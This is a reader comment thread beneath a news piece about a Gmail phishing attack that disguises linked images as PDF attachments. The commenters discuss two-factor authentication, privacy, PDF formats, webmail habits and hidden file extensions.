back to article Brilliant phishing attack probes sent mail, sends fake attachments

An newly-detected Gmail phishing attack sees criminals hack and then rifle through inboxes to target account owners' contacts with thoroughly convincing fake emails. The new attack uses the file names of sent attachments and applies that name into new attachments that appear to be PDFs but are actually images that, when …

  1. Anonymous South African Coward Bronze badge

    Already got 2FA enabled.

    But a bugger with 2FA is if you've forgotten your password... it is a pain to get back into your own account...

  2. Ken Moorhouse Silver badge

    can be saved by two factor authentication

    Except I suspect most people switch off TFA when they are on a pc that they trust.

    1. Anonymous Coward
      Anonymous Coward

      Re: can be saved by two factor authentication

      The fact is I don't trust Google having my phone number. That's why I no longer use Gmail too - nor I use webmail to access may mail (but rarely, when no other option is available).

      1. MrT

        Re: can be saved by two factor authentication

        Sadly, others who have your number could already unknowingly have given it to Google by all sorts of ways, who then link it back to you via metadata...

        1. Anonymous Coward
          Anonymous Coward

          Re: can be saved by two factor authentication

          Probably, but at least they have to work harder (and I do my best to block tracking and pollute the metadata). And they can't scan my emails.

          Unluckily, you can do little for all those morons around you.

      2. phuzz Silver badge
        Alert

        Re: can be saved by two factor authentication

        All it takes is for one of your friends or family to have created a contact with your email and phone number, and bam, google/facebook/whoever will now get your phone number every time your friend clicks the "sure I'd love to give you full access to my address book!" button.

        So next time you think someone's a friendless loner, maybe they're just being security-concious!

        1. Anonymous Coward
          Anonymous Coward

          Re: can be saved by two factor authentication

          "google/facebook/whoever will now get your phone number every time your friend clicks the "sure I'd love to give you full access to my address book!" button"

          Data mining's a bitch aint it?

          Frustratingly there are now plenty of apps - LinkedIn, Strava, FitBit, ... which ask to scan your contacts list to see if you already have 'friends' on the service they can link you to - or more likely they can lure onto the service on the basis that you have joined.

          Many of these services incorporate Facebook and Gplus authentication, which means that even if you created your account directly with them as I do, your details have likely been shared with these mega corporations. ("known as 'carefully selected third parties' in the terms and conditions)

        2. Queasy Rider

          Re: a friendless loner

          Way back when, I never gave out personal info over the net, and yet, a decade ago I searched my name and there I was, loud and proud. I deduced, by various means, that the local phone co. had sold my info. Not long after that, I dropped my landline, and went with a PAYG mobile. Last week I googled myself again and noted with satisfaction that I had disappeared from the web. So you can imagine my surprise when YESTERDAY, I climbed into a friend's car and she handed me a photo and asked me if I knew anybody there; and there, staring me in the face were my sister-in-law, her 2 daughters, and grandchild. I was shocked, and asked how she got that pic. "Oh, I was surfing in the library, and I printed it out for free."

          "But how and where did you find that?"

          "Don't have a clue."

          Well, neither do I. She swears she never entered my name, and she has nothing in common with my sister-in-law who lives 2,000 km away.

          I guess I'm not so lonely anymore. Damned Facebook. And no, I don't have a Facebook account, but you can't tell all your extended family to leave you off the web.

          1. Muscleguy

            Re: a friendless loner

            More years ago than I can remember I ticked the box where our voter registration details are not searchable or sellable on the register. Yet there we both still are as someone has posted an old version of the register and we are still living here. Sigh.

      3. Adam JC

        Re: can be saved by two factor authentication

        Do you have an android phone? If so, I got soe bad news for you sunshine....

        1. Anonymous Coward
          Anonymous Coward

          Re: can be saved by two factor authentication

          Of course, I don't have any Android device....

      4. Anonymous Coward
        Anonymous Coward

        Re: can be saved by two factor authentication

        "The fact is I don't trust Google having my phone number. "

        I have three phone numbers. One of them has never been used for anything other than 2FA, using an elderly webOS phone that is used for nothing else (and wouldn't be much use because HP's servers are turned off.) One of them is for things like Microsoft installs, using my other old phone. And one of them is actually given out to people. But nowadays I'm trying to use Yubico where possible for 2FA.

        I regard PAYG SIMs as the cost of security.

  3. This post has been deleted by its author

    1. find users who cut cat tail

      Re: Sigh. Not again.

      > I don't use PDFs for personal reasons (they are essentially a picture

      Sorry, but this is wrong.

      You might come across some poorly created PDFs that are indeed disorganised mess and no better than a picture. A reasonably structured PDF, however, allows not just extraction of all text (and the text makes sense) but can be imported into a vector graphics editor (again retaining the structure). If you edit PDFs in MS Paint you do not understand what PDF is -- it is *vector* graphics (plus some other bits).

      That said, if you want to send me text just send me a plain text, not PDF. If you want to send me vector graphics send me a SVG, not PDF. And if you want to send me a MS DOC file just send me a plain text because most likely you are ‘typographically challenged’ and the formatting will only hurt my eyes. But if you want to send me final formatted work intended for printing, yes, send me a PDF, not a JPEG inserted to PowerPoint. It is vector graphics so as a bonus I can extract text and images and make adjustments -- if the PDF was not created by a moron.

      1. Peter Gathercole Silver badge

        Re: Sigh. Not again.

        I don't know whether it's still true, but a PDF effectively used to be encapsulated PostScript, which allows very flexible device independent formatting, including embedded fonts, bitmaps and vector drawing capabilities.

        When it was first deployed, it used to be set up so that documents could be immutable, i.e. not changeable by the recipient, so that you could be sure that what you saw was what the creator wanted you to see.

        Of course, that did not suit everybody, so now PDFs are as editable as any other document format, and can even be used to produce forms that can be filled in and returned as a PDF.

        1. Vic

          Re: Sigh. Not again.

          When it was first deployed, it used to be set up so that documents could be immutable, i.e. not changeable by the recipient, so that you could be sure that what you saw was what the creator wanted you to see.

          Not really.

          There's a flag that says "please do not edit this file". That's the extent of your protection against edits...

          Vic.

      2. poohbear

        Re: Sigh. Not again.

        I got the impression that the original poster is blind (or has other vision problems), so all those downvotes are a bit harsh...

        FWIW there was a time way back when when Adobe, bless them, was going all out to make PDF the default format for the web, as opposed to HTML.

        Thankfully they lost that battle.

        1. Anonymous Coward
          Anonymous Coward

          Re: Sigh. Not again.

          Yeah, HTML + JavaScript is soooooo secure....

    2. agurney

      Re: Sigh. Not again.

      I use PDFs so I can control how my 'customers' see my documents. Having worked in the UK for various North American companies over the years I know what grief can be caused when trying to print US Letter documents on A4 paper, and vice versa.

    3. Anonymous Coward
      Anonymous Coward

      Re: Sigh. Not again.

      What you are _really_ complaining about is people sending binaries when they could send plain text. The rest of it was just a (self-righteous, ignorant) rant.

    4. Stuart Dole

      Re: Sigh. Not again.

      What the commenters miss here is that AC is a *blind person*. So yes, screen reading software for the visually impaired can choke badly on PDFs. Many of the PDFs I receive are actually pictures of a printed page, say captured with a scanner or phone camera. So they're really not editable... Find a visually impaired friend with a Braille computer or screen reader and ask them about PDFs.

      1. veti Silver badge

        Re: Sigh. Not again.

        If people are so clueless that they're scanning or photographing printed pages, then converting into a PDF that's just a big image file (per page), then yes, they deserve slapping.

        But most PDFs aren't created like that: they start out as Word (or similar) documents, and in that case the text can be read from them perfectly cleanly.

        I must say, it's a devilish clever attack. I've been thinking for years that the trouble with "security education" is, once it catches on, it's really pretty trivial for the phishers to up their game like this. And now they have.

        We need a new protocol, because email has been breaking for a long time now and this looks like the last straw.

        1. Phil W

          Re: Sigh. Not again.

          "If people are so clueless that they're scanning or photographing printed pages, then converting into a PDF"

          Unless of course you happen to work somewhere that operates a fleet of major brand MFDs which scan to email in PDF format (with an option for TIFF but that's not really better is it).

        2. Vic

          Re: Sigh. Not again.

          We need a new protocol, because email has been breaking for a long time now and this looks like the last straw.

          This isn't email breaking, this is an inherent problem with HTML.

          As with so many email-related risks, reading in plain text by default obviates this issue. If switching to HTML requires a positive action, the user should already be warned that strangeness might be around the next corner.

          But most people seem far more interested in shiny shiny than in security...

          Vic.

  4. Anonymous Coward
    Anonymous Coward

    This is why I never use webmail

    Webmail is so rife with dangers for the uninitiated it should be banned from use until the user has passed some sort of exam.

    Webmail makes users choose easy passwords so they can remember it when using a 3rd party PC, and because they CAN, they WILL use any PC that comes to hand, which risks (a) disclosure of logon details (not just keyloggers - one ill-advised click can get the logon details stored in the browser and cache) and (b) leaving behind attachments on that PC, typically in the %TEMP% area of the machine, something you don't fix with 2FA. It's a left over from the days of low bandwidth: documents would be downloaded in full first before you could open them, and the practice persists.

    Good webmail front ends make it possible to prevent access to attachments (leaving them only available for IMAP access), but in experience they're rare.

    This specific attack is enabled by hiding extensions and actual link targets, unfortunately something that Apple now defaults to in OSX, sorry, macOS as much as Microsoft does.

    1. TWB

      Re: This is why I never use webmail

      'Webmail makes users choose easy passwords' - mine does not - it gives me a pain-in-the-ares-to-remeber one and I cannot set it myself - but yes most webmail systems allow you to chose.

      My webmail is not provided by my ISP though...

      1. Anonymous Coward
        Anonymous Coward

        Re: This is why I never use webmail

        Webmail makes users choose easy passwords' - mine does not - it gives me a pain-in-the-ares-to-remeber one and I cannot set it myself - but yes most webmail systems allow you to chose.

        I may have expressed that better. What I meant to say was that users often deliberately pick easy to remember passwords precisely because they use webmail a lot on non-owned computers. If they had IMAP access it would mean they'd have to enter the password once to set things up and you could enforce complexity a lot easier, but webmail needs entering the details every time (not on their own machine) and convenience still preceeds security for most people. You can impose complexity, but then you just move the problem to the user carrying along a piece of paper.

        If users absolutely want webmail, 2FA ought to be mandatory.

    2. Anonymous Coward
      Anonymous Coward

      Re: This is why I never use webmail

      You can say that users choose easy password, but what if the password was remembered by the browser but never told to the user? In that case, the password could potentially be more secured... until we found out that the alternatives are also just as bad.

      In an office environment, if you don't or can't use webmail, you use Outlook. Guess what, Outlook (SMTP) download the attachment on the pc and pretty much let the user click on it quicker and easier. In addition, you won't get the hint from the blurry image but only the extension. What's the chance a typical user see the title legit and click on the attachment?

      There is no easy way to fix the incompetence.

  5. g00se
    WTF?

    Hide extensions for known file types

    The new attack uses the file names of sent attachments and applies that name into new attachments that appear to be PDFs but are actually images that, when clicked, send victims to phishing pages.

    Could this by any chance rely on the default (!) Explorer setting that is named in my title? If so, the fooled 'technical users' can't be that technical that they would want extensions hidden, quite apart from their using Windows in the first place ...

    1. Doctor Syntax Silver badge

      Re: Hide extensions for known file types

      That option should have been removed the moment it became clear what the dangers were.

      1. el_oscuro

        Re: Hide extensions for known file types

        The dangers of this option have been known for at least 20 years. Why it is still even a thing is beyond me.

    2. Keith Langmead

      Re: Hide extensions for known file types

      No, as I understand it there is no attachment, rather there's an image attached and displayed in the email. The image is designed to look the same as a normal Gmail attachment link, with the attachment name shown to be one you'd legitimately receive from that contact. So you click on what you think is a Gmail button but which is actually just a link, and get sent to the dodgy page.

      That said, I also think they should have binned the hide extensions default long long ago, and I'm amazed it's remained the default even on the latest versions Windows! In addition to the security issues, it's a support issue... I've seen so many people accidentally break their file associations and then not understand why they can't open certain docs. Un-hide extensions and you immediately see that no, it might have a PDF icon, but you're actually trying to open a docx file.

      1. Hargrove

        Re: Hide extensions for known file types

        I admit to being old and slow. Old enough to remember editing programs on the fly by punching in binary code on indicator/switches on the front panel of something the size of a (large) refrigerator.

        I appreciate that technology has changed. But, somethings should be fundamental. Like words should have meaning. Words like "Operating System."

        Classically, an operating system comprises the basic functions for managing the hardware resources required to store and retrieve data, and allow software to execute the instructions of the CPU.

        Explosive advances in hardware complexity and performance created a need for a hardware extraction layer. And things began to grow like Topsy, with applications being acquired and tacked on to "operating systems" like so many layers of barnacles. The resulting conglomeration requires constant patching and updates of Gbytes of code. The result is an internetworked global computing system--whose functional elements by the way include me and my computer, and billions of other users and devices. The configuration and functions at any level are unknown, and unknowable.

        Back in the day, if someone had described this I would have argued that such a system design was inherently insecure and un-securable, and that any expectation to the contrary was insanity.

        That's one thing that has not changed.

    3. Loud Speaker

      Re: Hide extensions for known file types

      Surely providing a means of hiding extensions is aiding and abetting crime, although presumably Microsoft would claim "Not guilty by reason of corporate insanity".

    4. Anonymous Coward
      Anonymous Coward

      Re: Hide extensions for known file types

      The issue here has nothing to do with Explorer, but with the data: URL scheme. The attachment never gets to your hard disk, it's a fake. When you attempt to open/download it, you get redirected to the fake Google login. You'll never leave the browser.

      AFAIK, it will work on any OS, with any browser supporting the data: scheme.

      This is an attack aimed at stealing Gmail credentials (and then probably download user data before using it to mount new attacks).

  6. wyatt

    I've experienced this, my wife received an email from a known source with the picture. We questioned the company who send us this and I suspect they've been compromised by it already.

    When you run your mouse over the picture you can see it isn't a PDF and a URL comes up, clever method I have to say.

  7. Shaha Alam

    any document with 'strategy' in the title should be immediately deleted to avoid frustration and mental anguish.

    now, what's all this talk about exploits in dodgy attachments?

  8. Potemkine Silver badge

    Amber

    Won't someone think of the daltonians?

    1. Destroy All Monsters Silver badge

      Re: Amber

      On the Internet, nobody knows that you are a dog....

  9. Baldrickk

    TomScott

    If that TomScott is the one I think he is (can't check at work), having known him from my Uni days, he's a gadget geek at most, I wouldn't call him a technical expert. Great guy though!

  10. David Nash Silver badge
    FAIL

    not-really-attachments

    I've occasionally received emails claiming to have "attachments" but which were actually links to documents on the sender's email system. Nothing dodgy (in the malware sense) in this case but not a nice way to do it, and I don't trust it at all. In my case I recall they may have been unsolicited CVs from a recruitment agent so draw your own conclusions!

  11. cd

    That guy always wants to color-code things, that's his solution in Wordfence. However, often the color-coding is incorrect and actually makes Wordfence a little harder to use.

    Given how AI is at sorting, I think a simpler solution is for Google to block linked images. They can be separate but not together. Also, this config could be easily added to a spam filter from their side. If their brains can't do it, why am I not working for them?

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like